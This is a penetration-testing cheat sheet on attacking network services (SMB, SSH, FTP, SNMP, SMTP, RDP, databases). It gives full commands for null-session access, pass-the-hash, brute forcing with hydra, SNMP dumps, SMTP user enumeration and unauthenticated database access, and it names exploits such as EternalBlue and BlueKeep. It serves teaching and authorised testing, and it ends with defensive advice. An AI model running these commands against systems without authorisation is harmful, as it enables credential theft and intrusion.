Service Protocol Attacks
Each network service (SMB, SSH, FTP, SNMP, SMTP, RDP, databases) has its own weaknesses, insecure configurations, and attack techniques. This card walks the most common services you’ll meet after enumeration (see Network Service Enumeration) and what to attack in each: default credentials, anonymous access, vulnerable versions, and protocols insecure by design.
SMB (139/445) — the most exploited on Windows networks
Section titled “SMB (139/445) — the most exploited on Windows networks”# enumeration and accessnxc smb host -u '' -p '' --shares --users # null sessionsmbclient //host/share -N # anonymous connection# attacksnxc smb host -u user -H <NThash> # Pass-the-Hash (see ad-lateral)# historical CVEs: EternalBlue (MS17-010), SMBGhost (CVE-2020-0796)nmap --script=smb-vuln-ms17-010 -p445 hostSMB is the door to the domain: shares with credentials, PtH, relay (see NTLM Relay).
SSH (22)
Section titled “SSH (22)”# enumerationssh-audit host ; nmap --script=ssh-auth-methods host# attackshydra -L users.txt -P pass.txt ssh://host # brute force (mind lockout)# stolen private keys, authorized_keys, agent hijacking# CVEs: by version (libssh auth bypass CVE-2018-10933, etc.)FTP (21)
Section titled “FTP (21)”# anonymous access (very common)ftp host -> anonymous / anonymousnmap --script=ftp-anon -p21 host# attacks: weak credentials, webshell upload if FTP->webroot, FTP bounceSNMP (161/UDP) — information goldmine
Section titled “SNMP (161/UDP) — information goldmine”# community strings (public = read-only, private = write)onesixtyone -c communities.txt hostsnmpwalk -v2c -c public host # dump the whole MIBsnmpbulkwalk -v2c -c public host # faster# reveals: processes, users, software, interfaces, routes, sometimes credentialsSNMP v1/v2c isn’t encrypted and uses trivial community strings: gold for internal recon.
SMTP (25)
Section titled “SMTP (25)”# user enumerationsmtp-user-enum -M VRFY -U users.txt -t host# open relay (send mail as anyone -> phishing)nmap --script=smtp-open-relay -p25 hostRDP (3389)
Section titled “RDP (3389)”nmap --script=rdp-ntlm-info,rdp-enum-encryption -p3389 host# BlueKeep (CVE-2019-0708): preauth RCE on old versions# attacks: brute force (crowbar/hydra), PtH with Restricted Admin (see ad-lateral)xfreerdp /v:host /u:user /pth:<NThash>Databases (1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 27017 Mongo, 6379 Redis)
Section titled “Databases (1433 MSSQL, 3306 MySQL, 5432 PostgreSQL, 27017 Mongo, 6379 Redis)”# default / no-auth credentialsmysql -h host -u root # no password (common in labs/dev)redis-cli -h host # Redis without auth -> file/SSH-key writemongo host # MongoDB without auth -> full dump# MSSQL: xp_cmdshell, linked servers (see ad-mssql)mssqlclient.py user:pass@host -windows-authRedis and MongoDB without authentication exposed to the Internet are frequent critical findings.
Telnet (23), rlogin, cleartext services
Section titled “Telnet (23), rlogin, cleartext services”Legacy protocols with no encryption: credentials travel in plaintext → capture via sniffing (see Network Sniffing). Their mere presence is already a finding.
For the defense
Section titled “For the defense”Cross-cutting principles: change default credentials, disable anonymous access and cleartext legacy protocols (Telnet, FTP, SNMPv1/2c → use SSH/FTPS/SNMPv3), patch vulnerable versions (EternalBlue, BlueKeep), don’t expose databases to the Internet, strong authentication + MFA where applicable, and segmentation. Monitor brute force (many login failures).
Testing checklist
Section titled “Testing checklist”- SMB: null session, shares, PtH, ms17-010
- SSH: auth methods, version, controlled brute force
- FTP: anonymous access, weak credentials
- SNMP: community strings and MIB walk
- SMTP: user enumeration and open relay
- RDP: NTLM info, BlueKeep, PtH
- Databases: no-auth / default credentials (Redis/Mongo/MySQL)
- Cleartext protocols (Telnet) for sniffing capture